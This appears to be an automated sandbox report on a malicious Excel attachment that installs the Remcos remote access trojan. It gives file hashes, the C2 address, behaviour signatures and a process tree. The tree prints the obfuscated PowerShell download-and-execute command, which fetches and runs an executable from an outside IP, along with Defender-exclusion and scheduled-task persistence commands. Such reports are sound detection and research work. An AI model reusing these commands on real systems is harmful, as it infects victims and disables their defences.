Analysis

  • max time kernel
    148s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240903-en locale:en-us os:windows7-x64 system
  • submitted
    17-12-2024 11:08

General

  • Target

    Smple_Order-048576744759475945.xls

  • Size

    1.1MB

  • MD5

    df946e734bca37e4eaf06978a0b95ef1

  • SHA1

    c06f8ddc7d5cb1030c516286bd0a660502cbbe35

  • SHA256

    7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744

  • SHA512

    e9dd9266c4dc5721b47d1d4de0e1525482cbec8330e5003f0444d940c99380efae89f7424d709e7aac4962e2541d84b06c1fb7d4686e0949a852e83b39d5dc96

  • SSDEEP

    12288:qymzHJEUiOIBUzMTSgD3DERnLRmF8DrEPTxpsAQx1Zj+j+EPebSA5YiA76UdKX/E:4BaRbARM8+D8Z+jJC50YrNPkly4h

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page

    Hiding page source

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of the victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Smple_Order-048576744759475945.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2504
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'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'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\feg31p-0.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC85F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC85E.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2684
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\QJXouGSsQAwOR.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QJXouGSsQAwOR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp165E.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1268
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            5⤵
            PID:1276

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      2KB

      MD5

      bf784edee93fca58a4f656c76f07c1b4

      SHA1

      4965c03faaeec20f1b0cefa4844608e403d2569c

      SHA256

      82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

      SHA512

      3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

      Filesize

      471B

      MD5

      90c52d81ab9066022771fa4424ea7e8f

      SHA1

      161e7b2f33071b4f2d52dab3e273e1b9edb55b0b

      SHA256

      a3e87172d27129cc41d87a9f38bab1912cd2d241b1934086678e1d88602c9284

      SHA512

      ec0a5f3a8a846383ddf29c57355516785de9a8c3dbcfad388c22e425298ab84617e45d994fa6946d89eeb6253916d9e8ece51cefced0542f23dc727917a2ff2f

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      1KB

      MD5

      9047d91427fbc84f6f261fa8961d626b

      SHA1

      a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

      SHA256

      3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

      SHA512

      dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      488B

      MD5

      983857efe5b5fddf68aba793432eae89

      SHA1

      83ff476faf22175b9ac9bd53089b6a916d3134d3

      SHA256

      8519452e4d2d3910a760644a02f0af4037d48626197dd747ad469479bf84fa5e

      SHA512

      78439a1fa4afd8b7cd8e7c2f2afa11e5a6e579c64346cbf527c2a28e2b75fa77e1856acb38ea83604c4d1dd778df24399bdc102d0df0742fe60d3706022a33e4

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

      Filesize

      480B

      MD5

      102400c8bfe9432c210919ae7ad3b4c9

      SHA1

      cd3f418b8356cd70edffe8304065f30ede9e67b3

      SHA256

      c694bf52db8ef74d13eff0287ca444b1c5ca649508360299e28f6007b76b3501

      SHA512

      4edac3688e98b074c174ab31dcca24e36604151d307f6454cabbb4f02c41b3e44ae5cf250a721f3259d0a099cb582ea65486a8bd2792587170671371113be75c

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      ddbd2662de0ec120674fd0d69fc0d3a5

      SHA1

      3348ffe3b31fd617f42d766700df7be23412056b

      SHA256

      df4d335eefe59cea3e427f6cb3b8954db853bfa27effffac28fb000a621ccf3a

      SHA512

      8af9530d12ba1bf7aab0323258d356f441ec80820a1c279de782fdccd5649823ae3347c4d96982e4de10fc49702d88a9de00b0653a6697e47024a906b9439060

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      482B

      MD5

      3405778f349129669fc7948f68dfccd2

      SHA1

      ef5685e7583a9aba8e43aea0f4da034ef30687ec

      SHA256

      45b9eec55576c2001787d6dbebeb8324707fa98bd8822e49197f25a738a28602

      SHA512

      0ecd7b30e0625c3060429df20b4f0e42e4db081612208e921e5828d3887bed900c57b8e4a9079bff36b6c823718f30e53bf9f6a0673b2d813dae1143f45729ca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\crreatedbestthingswithgreatattitudeneedforthat[1].hta

      Filesize

      8KB

      MD5

      e4c5ceeb8c98c1c23a0ff6cd1a4d36e4

      SHA1

      033d24c4375394ad9ede6a94cc80bca6b47a1ef7

      SHA256

      bea2fd609f237d38625a50f7bb5688e7dcfdeb39e5641bb881e257807761b902

      SHA512

      b152a9bcbef1fb5594f0a4f4c9d0e59ffa748a226cefbd967d65aed315d2230ad340d345077866f6d1682e892e5dab9a8b776a7152759db1c4834ab6678337a1

    • C:\Users\Admin\AppData\Local\Temp\CabAF17.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\RESC85F.tmp

      Filesize

      1KB

      MD5

      62ed7a7b934ae33aa32d0cc33cfffdad

      SHA1

      72bf11f9f0fe69dca5456cb0364a800f70901cdb

      SHA256

      20c2b6515a3e154f7fddc0b3f691582972f25d99b7f8e2906b3ccfa58b154866

      SHA512

      f21252904459bbd9eda4c7c0a9e7272c96d12ac636d04370e53f5ed2cdd8a7be6e23c2c544e4b320750f35864b25dc2e17b7e56c8db0c332236071146a3f355c

    • C:\Users\Admin\AppData\Local\Temp\TarAF39.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\feg31p-0.dll

      Filesize

      3KB

      MD5

      30e9388e63ba48c0018d56ad0dd5143b

      SHA1

      35032878d298b81ead613a7c8d0daeedbb687be3

      SHA256

      ed3cb3218e611c2d4d60e0e71548210b5643a385d4329dcd2bd46bf02531b6f9

      SHA512

      8d802ab7ff37558bca2b16f1f66a3770354c1c0ec499a2cbfd03a61bb758c91a06f2fd9ccf441de287dbb1a28b10e66c233bc695d47ebc42ba2ea6f5579104e7

    • C:\Users\Admin\AppData\Local\Temp\feg31p-0.pdb

      Filesize

      7KB

      MD5

      9b083eead0c949e42f01335cd9fa5820

      SHA1

      2b969a1da5c07eb805d0ae60d0adf0198169dca3

      SHA256

      f458a416e6e090d85eee43f326a646a7cadf0be1c310dab27643e0b4ff1a15f7

      SHA512

      d46b06dafdbc911214a696a8d7d2a81acc74ae5e8db9c3a8666f74de346802ffcf9e4c2ee45f686f242ad8cbfcdfe9a0daf0e85512faa52be3f892b1d67aaeaa

    • C:\Users\Admin\AppData\Local\Temp\tmp165E.tmp

      Filesize

      1KB

      MD5

      078d0186382e7d1df78ce5d47e0850c2

      SHA1

      b0abd159c081fe855579877888caad632e4f07a8

      SHA256

      46211de3331ea80485186ab3d55d8728445329188a7c1d1fee8d338788a86553

      SHA512

      c11a503a54aa6d8f44b75872441320be56874f76d9e1d12c50985ed4653be40c120455f06cd57bfe5b52739e8c0a0a134be9eeed9764a8fbb59f9200ad298a61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C5BXCEF36WYB3J0HOLUT.temp

      Filesize

      7KB

      MD5

      58de9f5b5d6253bbf638b313acdba349

      SHA1

      ef9f01f6bccda55346f231e809a97905be79ae08

      SHA256

      7be79678fe40e3e1dc483d1f4a5d4ca741c9e974349cae98366cc83eb1d71750

      SHA512

      12cfb3517f869b496bd4616cfdf62ca847d67c7dc48ca114c15ebc3096f98c5b4aaac67258d749b0c6f010ad45cec345ba410a48deb0cc3173cdd19f452e9756

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      82d0a29a32602d8ecaaf08b918bf552e

      SHA1

      1b5ec66d8a9ff8d8fb7e58fee33dfcf3c86f2312

      SHA256

      cb04b8c06a40eb13c942749cb89266a52fb40555f23564012b233ab6863205b9

      SHA512

      4dcf36788fb482ed5569f81f135ac81d3ac424830a0cfa0d5f7766179391c7f4aed3c1cfde8c4355523d2bc7c19d52530b9ef51ae5847f0dd32920494ed4e1f1

    • \??\c:\Users\Admin\AppData\Local\Temp\CSCC85E.tmp

      Filesize

      652B

      MD5

      3f338f3703e4cb00c3bd11890cec66ad

      SHA1

      d369935952701ad4b4f7981021d2c58993b99e8b

      SHA256

      4910e912b47b938c626dd3292c8a5d4212a2870a252d986dbfe3e07ebb21f923

      SHA512

      249c7ce06a2c87670f353ec7b0dadcf4a3859d1e708a9e6ba26652094e7c59714901401658ab4002aa1c38fd1c8b482deafd9246e7ee0fef14404423b2ca0042

    • \??\c:\Users\Admin\AppData\Local\Temp\feg31p-0.0.cs

      Filesize

      478B

      MD5

      80c03b4485808d996cc8226157f377a7

      SHA1

      7cc7e02b84232b1523c555a349c86fc059a98eff

      SHA256

      240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

      SHA512

      ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

    • \??\c:\Users\Admin\AppData\Local\Temp\feg31p-0.cmdline

      Filesize

      309B

      MD5

      475a256a7b11181573c738731d69d596

      SHA1

      3e7cd4d5e234e7ccf626ee7734e0fda47bd5204d

      SHA256

      614c94881b012cb0a05ac14f027a7e3ef7b8b4c594ba8c453bc4ff139399108f

      SHA512

      7ab2ccc6171a5f44b2ce608b457ce88f112746d7cbb5387a6ce142cf888256ec854cdf0d8e3e824be157450d78bd120645c4be510fff93aebfbbbe05b0dd97b4

    • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

      Filesize

      1.1MB

      MD5

      387a4f5a3791b3467434add8798e156c

      SHA1

      3eb4d42ca10ca4705bd8e6411e09b31b8f04914e

      SHA256

      0ccf18985ae70f2004c2ccc11f470b7bbd0884fce623a606a67b2e4e66916791

      SHA512

      7ad99b695ca917759de3bb75bc1f449f80b6b8d44b081b2036e4824a82847df4990c21862b49c71da79d3d4c3e115bcb3edea8b10e7a445be66dfa8da9cb1eff

    • memory/1276-135-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-144-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-149-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-148-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-146-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-142-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-147-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-145-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-125-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-138-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-141-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-140-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-137-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/1276-143-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-133-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-139-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-129-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-127-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-131-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2260-60-0x0000000002760000-0x0000000002762000-memory.dmp

      Filesize

      8KB

    • memory/2504-1-0x0000000072CED000-0x0000000072CF8000-memory.dmp

      Filesize

      44KB

    • memory/2504-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2504-83-0x0000000072CED000-0x0000000072CF8000-memory.dmp

      Filesize

      44KB

    • memory/2504-61-0x0000000002F10000-0x0000000002F12000-memory.dmp

      Filesize

      8KB

    • memory/2564-114-0x0000000005680000-0x0000000005744000-memory.dmp

      Filesize

      784KB

    • memory/2564-113-0x0000000000AF0000-0x0000000000B16000-memory.dmp

      Filesize

      152KB

    • memory/2564-112-0x00000000011E0000-0x00000000012FA000-memory.dmp

      Filesize

      1.1MB